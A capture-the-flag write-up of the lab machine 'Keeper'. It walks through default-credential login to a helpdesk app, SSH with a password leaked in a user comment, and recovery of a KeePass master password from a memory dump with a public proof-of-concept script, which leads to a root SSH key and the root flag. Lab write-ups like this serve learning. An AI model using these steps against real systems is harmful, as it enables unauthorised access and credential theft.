HTB: Keeper

Keeper is an easy HTB machine which mimics a helpdesk. I get initial access with default credentials. With that I find a comment which reveals a password that I use to log in to SSH. I then use an exploit on the KeePass dump file, which gives the root PuTTY SSH key.

I start with an nmap scan: sudo nmap -sVC -v 10.10.11.227 -oN nmap/all

It shows ports 22, 80 and 8000 open.

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_  256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
8000/tcp open  http    SimpleHTTPServer 0.6 (Python 3.10.12)
| http-methods:
|_  Supported Methods: GET HEAD
|_http-title: Directory listing for /
|_http-server-header: SimpleHTTP/0.6 Python/3.10.12
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

A Python SimpleHTTPServer runs on port 8000 with directory listing enabled, so the files are shown directly on the page.

Here it shows the user flag!
I download the other files to my Linux machine; the passcodes.kdbx and KeePassDumpFull.dmp files stand out (the RT30000.zip file also contains these files).
I tried keepass2john to bruteforce the database, but got no results.

I didn't have KeePass yet, so I downloaded it from https://keepassxc.org/

For now I wanted to continue exploring the other ports.

The web page on port 80 shows the following:

I add tickets.keeper.htb to my /etc/hosts file.

It displays the following page. After trying some default usernames and passwords, it lets me in with root:password.
The users page shows two users.

On lnorgaard's user page, there is a comment that reveals an initial password.

I try to connect via SSH with that password and it works!

ls -la shows that lnorgaard's home directory is the same directory served by the Python HTTP server on port 8000.

After looking online for what I could do with a KeePassDumpFull.dmp file, I stumbled upon the following GitHub script:
https://github.com/CMEPW/keepass-dump-masterkey

python3 poc.py ~/Documents/keeper/webserver_downloads/KeePassDumpFull.dmp
2023-09-01 14:07:59,930 [.] [main] Opened /home/fabian/Documents/keeper/webserver_downloads/KeePassDumpFull.dmp
Possible password: ●,dgr●d med fl●de
Possible password: ●ldgr●d med fl●de
Possible password: ●`dgr●d med fl●de
Possible password: ●-dgr●d med fl●de
Possible password: ●'dgr●d med fl●de
Possible password: ●]dgr●d med fl●de
Possible password: ●Adgr●d med fl●de

Reading past the garbled characters, this looks like: rodgrod med flode

After googling, it turned out to be this Danish dish (rødgrød med fløde).

With that in hand, I managed to unlock the database file! It contains a note with a PuTTY private key for root.

I installed PuTTY for Linux: sudo apt install putty

I copied the note contents to a file named putty_key.

Then I use puttygen with -O private-openssh to convert it to an OpenSSH private key.

puttygen putty_key -O private-openssh -o new_ssh_key

Using ssh with new_ssh_key to connect as root:

ssh -i ./new_ssh_key root@10.10.11.227

And I successfully found the root flag!

root@keeper:~# cat root.txt
e205f760f01c160cd091fec25090159c